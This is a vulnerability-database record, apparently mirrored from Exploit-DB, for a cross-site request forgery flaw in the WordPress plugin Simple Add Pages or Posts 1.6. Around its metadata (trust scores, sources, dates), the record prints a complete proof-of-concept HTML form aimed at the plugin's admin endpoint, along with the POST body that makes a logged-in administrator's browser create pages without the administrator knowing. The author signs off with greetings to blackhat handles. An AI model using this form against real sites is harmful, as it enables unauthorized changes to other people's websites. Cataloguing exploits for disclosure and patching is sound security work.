ID

VAR-E-201601-0194


EDB ID

39384


TITLE

WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 39384

DESCRIPTION

WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery. Webapps exploit for the PHP platform.

Trust: 0.6

sources: EXPLOIT-DB: 39384

AFFECTED PRODUCTS

vendor: wordpress, model: plugin simple add pages or posts, scope: eq, version: 1.6

Trust: 1.0

vendor: wordpress, model: simple add pages or posts plugin, scope: eq, version: 1.6

Trust: 0.6

sources: EXPLOIT-DB: 39384 // EDBNET: 60750

EXPLOIT

########################################################################
# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
# Date: 2016/29/01
# Exploit Author: ALIREZA_PROMIS
# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
# Version: 1.6
# Tested on: ubuntu / FireFox
########################################################################

[Exploitation]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

[HTML CODE ]
<form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php">
<select name="postorpage">
<option value="page">Page</option>
<option value="post">Post</option>
</select>
<td colspan="2"><select name='post_parent' id='post_parent'>
<option value="">No, do not use parent</option>
<option class="level-0" value="2">Sample Page</option>
</select>
<tr class="alternate iedit">
<textarea name="titles" rows="1" cols="30"></textarea>
<tr class="iedit">
<td colspan="2"><select name="author_id">
<option value="1">admin</option></select>
<input type="submit" name="submitbutton" value="Add" class="button-primary"></form>

and live POST request :
postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add

########################################################################
# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
#
# [+] fb.com/alirezapomis.blackhat
########################################################################

Trust: 1.0

sources: EXPLOIT-DB: 39384

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 39384

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 39384

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 39384

TAGS

tag:WordPress Plugin

Trust: 1.0

sources: EXPLOIT-DB: 39384

CREDITS

ALIREZA_PROMIS

Trust: 0.6

sources: EXPLOIT-DB: 39384

EXTERNAL IDS

db: EXPLOIT-DB, id: 39384

Trust: 1.6

db: EDBNET, id: 60750

Trust: 0.6

sources: EXPLOIT-DB: 39384 // EDBNET: 60750

REFERENCES

url:https://www.exploit-db.com/exploits/39384/

Trust: 0.6

sources: EDBNET: 60750

SOURCES

db: EXPLOIT-DB, id: 39384
db: EDBNET, id: 60750

LAST UPDATE DATE

2022-07-27T09:49:33.420000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB, id: 39384, date: 2016-01-29T00:00:00
db: EDBNET, id: 60750, date: 2016-01-29T00:00:00